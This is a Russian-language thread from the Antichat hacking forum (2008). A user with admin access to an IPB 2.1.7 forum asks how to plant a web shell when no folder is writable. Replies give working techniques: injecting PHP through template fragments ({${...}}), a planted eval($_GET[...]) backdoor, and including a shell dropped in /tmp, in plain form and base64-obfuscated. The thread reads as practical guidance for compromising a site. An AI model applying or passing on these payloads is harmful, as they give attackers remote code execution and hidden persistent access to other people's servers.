ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов не хватает прав...

   

Страница 1 из 2 1 2 >

Опции темы

Поиск в этой теме

Опции просмотра

не хватает прав...   #1   06.01.2008, 21:13 Doom123 Постоянный Регистрация: 11.11.2006 Сообщений: 834 С нами: 10262314 Репутация: 668 не хватает прав... Есть админка ipb 2.1.7 можно ли залить шелл если нет ни одно папки с правами на запись ...? Они запритили всё даже авики загружать.. 𝕏 Twitter Reddit Telegram Копировать ссылку   Doom123 Посмотреть профиль Репутация Отправить личное сообщение для Doom123 Найти все сообщения от Doom123 Добавить в друзья   #2   06.01.2008, 21:24 blackybr ♠ ♦ ♣ ♥ Регистрация: 18.05.2006 Сообщений: 1,828 С нами: 10516826 Репутация: 3742 шаблоны правятся? __________________ Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2   blackybr Посмотреть профиль Репутация Отправить личное сообщение для blackybr Найти все сообщения от blackybr Добавить в друзья   #3   06.01.2008, 21:30 Doom123 Постоянный Регистрация: 11.11.2006 Сообщений: 834 С нами: 10262314 Репутация: 668 могу изминять фрагменты шаблонов   Doom123 Посмотреть профиль Репутация Отправить личное сообщение для Doom123 Найти все сообщения от Doom123 Добавить в друзья   #4   06.01.2008, 21:33 blackybr ♠ ♦ ♣ ♥ Регистрация: 18.05.2006 Сообщений: 1,828 С нами: 10516826 Репутация: 3742 ну инжектни пхп код тогда, в чем проблема. Цитата: {${код}} ex: {${phpinfo();}} __________________ Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2   blackybr Посмотреть профиль Репутация Отправить личное сообщение для blackybr Найти все сообщения от blackybr Добавить в друзья   #5   06.01.2008, 21:50 Doom123 Постоянный Регистрация: 11.11.2006 Сообщений: 834 С нами: 10262314 Репутация: 668 Пасиб щя посмотрим=)   Doom123 Посмотреть профиль Репутация Отправить личное сообщение для Doom123 Найти все сообщения от Doom123 Добавить в друзья   #6   06.01.2008, 22:00 Doom123 Постоянный Регистрация: 11.11.2006 Сообщений: 834 С нами: 10262314 Репутация: 668 не идёт... при добавлении того же {${phpinfo();}} в шаблон он просто выводит белую страницу... на странице где этот шаблон =(   Doom123 Посмотреть профиль Репутация Отправить личное сообщение для Doom123 Найти все сообщения от Doom123 Добавить в друзья   #7   06.01.2008, 22:24 Doom123 Постоянный Регистрация: 11.11.2006 Сообщений: 834 С нами: 10262314 Репутация: 668 хмм если прописываю eval($_GET[ww]); и добовляю в адресной строке &ww=phpinfo() то он мне выводит eval(phpinfo()); почему $_GET[] сработало а eval нет отключили ?   Doom123 Посмотреть профиль Репутация Отправить личное сообщение для Doom123 Найти все сообщения от Doom123 Добавить в друзья   #8   06.01.2008, 22:55 Doom123 Постоянный Регистрация: 11.11.2006 Сообщений: 834 С нами: 10262314 Репутация: 668 Вроде получилось залить в /tmp форум находится тут /home/blalba/www/forum шелл залит сюда /tmp/shell.php нельзя никак на него попасть да?   Doom123 Посмотреть профиль Репутация Отправить личное сообщение для Doom123 Найти все сообщения от Doom123 Добавить в друзья   #9   06.01.2008, 23:00 Piflit Banned Регистрация: 11.08.2006 Сообщений: 1,522 С нами: 10393869 Репутация: 2032 допиши в шаблоны include('/tmp/shell.php');   Piflit Посмотреть профиль Репутация Найти все сообщения от Piflit Добавить в друзья   #10   06.01.2008, 23:09 blackybr ♠ ♦ ♣ ♥ Регистрация: 18.05.2006 Сообщений: 1,828 С нами: 10516826 Репутация: 3742 а лучше {${eval(base64_decode(QGluY2x1ZGUoJy90bXAvc2hlbGwu cGhwJyk7));}} __________________ Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2   blackybr Посмотреть профиль Репутация Отправить личное сообщение для blackybr Найти все сообщения от blackybr Добавить в друзья

Страница 1 из 2 1 2 >

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Хакер и закон!	SladerNon	Болталка	17	12.11.2009 09:42
Что можно сделать в админке форума IPB, если папка на смайлы не имеет прав?	link	Уязвимости CMS / форумов	5	06.04.2005 23:28

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход Мой кабинет Личные сообщения Подписки Кто на форуме Поиск по форуму Главная страница форума ИНФО     Мировые новости. Обсуждения.     Статьи         Избранное РАЗРАБОТКА     Ваши проекты     SЕО - тонкости, методы раскрутки         Услуги, Покупка и Продажа в SEO     Хостинги - Hostings         Хостинг, Dedicated, VDS, Сервера - покупка, продажа     Для Администратора         Apple: Mac, OS X, iOS         AntiDDos - АнтиДДОС         Windows         Linux, Freebsd, *nix ПРОГРАММИРОВАНИЕ     Общие вопросы программирования         ПО для Web разработчика     PHP     Python     С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby     Реверсинг ФИНАНСОВЫЕ ЗАДАЧИ/СОЦИАЛЬНЫЕ СЕТИ     Покупка, Продажа, Обмен         Разное - Покупка, продажа, обмен         Услуги, Покупка и Продажа в SEO         Электронные валюты: Обмен, Вывод, Ввод         VPN, Proxy, Socks - Покупка, продажа         Хостинг, Dedicated, VDS, Сервера - Покупка, продажа         Мобильная связь, СМС - Покупка, продажа         Трафик, инсталлы, загрузки - Покупка, продажа         Покупка, продажа, услуги в Соц. Сетях     Партнерки     Freelance - О Работе         Предложения работы, услуг     Социальные сети         Покупка, продажа, услуги в Соц. Сетях     Платежные системы         Электронные валюты: Обмен, Вывод, Ввод         Blockchain, Криптовалюты, смарт-контракты ЛИЧНЫЕ ФОРУМЫ     Арбитраж трафика ОФФТОП     Болталка     Forum for discussion of ANTICHAT     Video.Antichat         Комментарии к видео     Архив         ICQ - Покупка, продажа